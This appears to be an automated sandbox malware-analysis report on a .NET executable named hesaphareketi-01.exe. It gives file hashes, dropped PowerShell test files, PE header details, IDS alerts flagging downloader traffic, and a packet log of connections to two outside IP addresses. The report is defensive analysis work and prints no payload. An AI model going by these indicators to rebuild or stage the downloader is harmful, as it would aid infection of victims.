...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_htqyki2q.irf.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t11yzkaa.zkm.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uai1qor4.jls.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvkkfpcb.wd0.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.577204816678419
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	hesaphareketi-01.exe
File size:	884'736 bytes
MD5:	1a2030277b88a72feac4f57f6514494a
SHA1:	29858e377f52ba70fad5d3f24c30e2264d96ea96
SHA256:	c387b91dd56a4b66da4582e26ebc0c5a473e37251fb44650fc62d6d4749d5c8c
SHA512:	15fb1909628f42b05fb23c3d1a492ffd7a1897c63ef1b9d9380c1026b5a02c661cd5ab94d6d56d5d1f942c9172c34de11717bf21650981b7cff788437981ca63
SSDEEP:	12288:zTvI+u/WO2QaanbotSUN3o7ifGY4+wZy2jifuNHXSRcEgPKxIYzsT:3vIFSYgp32872lWWtSBgmIYzs
TLSH:	95159CC076386B05D97947B19539DDB083B1292AB029F6D60CCAFBFB35A87135A08F47
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....G................0..t............... ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4d92fa
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x90DC47B8 [Sun Jan 6 02:43:04 2047 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd92a6	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xda000	0x63c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xdc000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xd54b4	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xd7300	0xd7400	feadc594f53b948933c975675e81eb17	False	0.8136659770615563	data	7.58541302254658	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xda000	0x63c	0x800	92cfcdf1d1bb788779e7c3f324c46707	False	0.3388671875	data	3.4838197795146737	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xdc000	0xc	0x200	c92d48ce5e1a2b1b69d06a5a54f0eaa3	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xda090	0x3ac	data			0.41595744680851066
RT_MANIFEST	0xda44c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-03T09:11:21.166324+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49708	193.122.6.168	80	TCP
2024-10-03T09:11:22.697559+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49708	193.122.6.168	80	TCP
2024-10-03T09:11:23.282454+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49710	188.114.96.3	443	TCP
2024-10-03T09:11:23.933420+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49712	193.122.6.168	80	TCP
2024-10-03T09:11:27.310384+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49716	188.114.96.3	443	TCP
2024-10-03T09:11:33.568265+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49728	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 09:11:20.289690971 CEST	49708	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:20.294594049 CEST	80	49708	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:20.294667006 CEST	49708	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:20.294878960 CEST	49708	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:20.299665928 CEST	80	49708	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:20.929568052 CEST	80	49708	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:20.937781096 CEST	49708	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:20.942636967 CEST	80	49708	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:21.125109911 CEST	80	49708	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:21.166323900 CEST	49708	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:21.208715916 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:21.208760023 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:21.209206104 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:21.245884895 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:21.245910883 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:21.709742069 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:21.710239887 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:21.733053923 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:21.733071089 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:21.733885050 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:21.775702000 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:22.066410065 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:22.107409000 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:22.171569109 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:22.171688080 CEST	443	49709	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:22.171732903 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:22.313587904 CEST	49709	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:22.393657923 CEST	49708	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:22.398572922 CEST	80	49708	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:22.656675100 CEST	80	49708	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:22.679044008 CEST	49710	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:22.679084063 CEST	443	49710	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:22.679140091 CEST	49710	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:22.679630995 CEST	49710	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:22.679646015 CEST	443	49710	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:22.697559118 CEST	49708	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:23.138896942 CEST	443	49710	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:23.145056963 CEST	49710	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:23.145102024 CEST	443	49710	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:23.282471895 CEST	443	49710	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:23.282558918 CEST	443	49710	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:23.282614946 CEST	49710	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:23.283164978 CEST	49710	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:23.286952019 CEST	49708	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:23.288161993 CEST	49712	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:23.292068005 CEST	80	49708	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:23.292957067 CEST	80	49712	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:23.293024063 CEST	49708	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:23.293056011 CEST	49712	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:23.293189049 CEST	49712	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:23.297945023 CEST	80	49712	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:23.933223009 CEST	80	49712	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:23.933419943 CEST	49712	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:23.934550047 CEST	49714	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:23.934588909 CEST	443	49714	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:23.934793949 CEST	49714	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:23.935081005 CEST	49714	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:23.935097933 CEST	443	49714	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:23.938524008 CEST	80	49712	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:23.938576937 CEST	49712	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:24.569355965 CEST	443	49714	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:24.570895910 CEST	49714	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:24.570931911 CEST	443	49714	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:24.718875885 CEST	443	49714	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:24.718975067 CEST	443	49714	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:24.719028950 CEST	49714	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:24.719371080 CEST	49714	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:24.723687887 CEST	49715	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:24.728516102 CEST	80	49715	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:24.728606939 CEST	49715	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:24.728694916 CEST	49715	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:24.733474016 CEST	80	49715	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:26.712038994 CEST	80	49715	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:26.712404013 CEST	80	49715	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:26.712444067 CEST	80	49715	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:26.712491989 CEST	49715	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:26.712519884 CEST	49715	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:26.712949038 CEST	80	49715	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:26.713819027 CEST	49716	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:26.713829041 CEST	49715	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:26.713870049 CEST	443	49716	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:26.713922977 CEST	49716	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:26.714160919 CEST	49716	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:26.714169979 CEST	443	49716	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:27.167238951 CEST	443	49716	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:27.170846939 CEST	49716	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:27.170866966 CEST	443	49716	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:27.310388088 CEST	443	49716	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:27.310472012 CEST	443	49716	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:27.310585976 CEST	49716	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:27.311333895 CEST	49716	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:27.314930916 CEST	49715	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:27.316139936 CEST	49717	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:27.320173025 CEST	80	49715	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:27.320287943 CEST	49715	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:27.321029902 CEST	80	49717	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:27.321111917 CEST	49717	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:27.321232080 CEST	49717	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:27.326199055 CEST	80	49717	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:27.945125103 CEST	80	49717	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:27.946691990 CEST	49718	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:27.946748972 CEST	443	49718	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:27.946830034 CEST	49718	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:27.947071075 CEST	49718	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:27.947088003 CEST	443	49718	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:27.994497061 CEST	49717	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:28.403928041 CEST	443	49718	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:28.405663967 CEST	49718	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:28.405709982 CEST	443	49718	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:28.548190117 CEST	443	49718	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:28.548295021 CEST	443	49718	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:28.548346996 CEST	49718	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:28.548876047 CEST	49718	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:28.552455902 CEST	49717	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:28.553077936 CEST	49719	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:28.557461023 CEST	80	49717	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:28.557519913 CEST	49717	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:28.557843924 CEST	80	49719	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:28.557913065 CEST	49719	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:28.557998896 CEST	49719	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:28.562711954 CEST	80	49719	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:29.784427881 CEST	80	49719	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:29.785913944 CEST	49720	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:29.785969973 CEST	443	49720	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:29.786057949 CEST	49720	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:29.786325932 CEST	49720	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:29.786344051 CEST	443	49720	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:29.838267088 CEST	49719	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:30.244626999 CEST	443	49720	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:30.246438980 CEST	49720	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:30.246478081 CEST	443	49720	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:30.378891945 CEST	443	49720	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:30.378988981 CEST	443	49720	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:30.379066944 CEST	49720	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:30.379710913 CEST	49720	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:30.383759022 CEST	49719	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:30.385169029 CEST	49721	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:30.389024973 CEST	80	49719	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:30.389199972 CEST	49719	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:30.390007973 CEST	80	49721	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:30.390110970 CEST	49721	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:30.390239954 CEST	49721	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:30.395047903 CEST	80	49721	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:31.019678116 CEST	80	49721	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:31.021054983 CEST	49722	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:31.021112919 CEST	443	49722	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:31.021224976 CEST	49722	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:31.021481037 CEST	49722	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:31.021492958 CEST	443	49722	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:31.072642088 CEST	49721	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:31.481098890 CEST	443	49722	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:31.482865095 CEST	49722	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:31.482882977 CEST	443	49722	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:31.624140024 CEST	443	49722	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:31.624408960 CEST	443	49722	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:31.624458075 CEST	49722	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:31.625216961 CEST	49722	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:31.631808043 CEST	49721	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:31.633333921 CEST	49723	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:31.637026072 CEST	80	49721	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:31.637087107 CEST	49721	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:31.638120890 CEST	80	49723	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:31.638194084 CEST	49723	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:31.638338089 CEST	49723	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:31.643131018 CEST	80	49723	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:32.939493895 CEST	80	49723	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:32.940901041 CEST	49728	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:32.940944910 CEST	443	49728	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:32.941009998 CEST	49728	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:32.941349030 CEST	49728	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:32.941364050 CEST	443	49728	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:32.994489908 CEST	49723	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:33.423326015 CEST	443	49728	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:33.424932957 CEST	49728	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:33.424957037 CEST	443	49728	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:33.568279982 CEST	443	49728	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:33.568381071 CEST	443	49728	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:33.568428040 CEST	49728	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:33.569072008 CEST	49728	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:33.572349072 CEST	49723	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:33.573602915 CEST	49730	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:33.577547073 CEST	80	49723	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:33.577605963 CEST	49723	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:33.578409910 CEST	80	49730	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:33.578475952 CEST	49730	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:33.578594923 CEST	49730	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:33.583372116 CEST	80	49730	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:35.391427040 CEST	80	49730	193.122.6.168	192.168.2.9
Oct 3, 2024 09:11:35.392817974 CEST	49731	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:35.392878056 CEST	443	49731	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:35.392980099 CEST	49731	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:35.393275976 CEST	49731	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:35.393290043 CEST	443	49731	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:35.431996107 CEST	49730	80	192.168.2.9	193.122.6.168
Oct 3, 2024 09:11:35.874568939 CEST	443	49731	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:35.882664919 CEST	49731	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:35.882695913 CEST	443	49731	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:36.017724037 CEST	443	49731	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:36.017813921 CEST	443	49731	188.114.96.3	192.168.2.9
Oct 3, 2024 09:11:36.017910957 CEST	49731	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:36.018470049 CEST	49731	443	192.168.2.9	188.114.96.3
Oct 3, 2024 09:11:36.045089006 CEST	49730	80	192.168.2.9	193.122.6.168
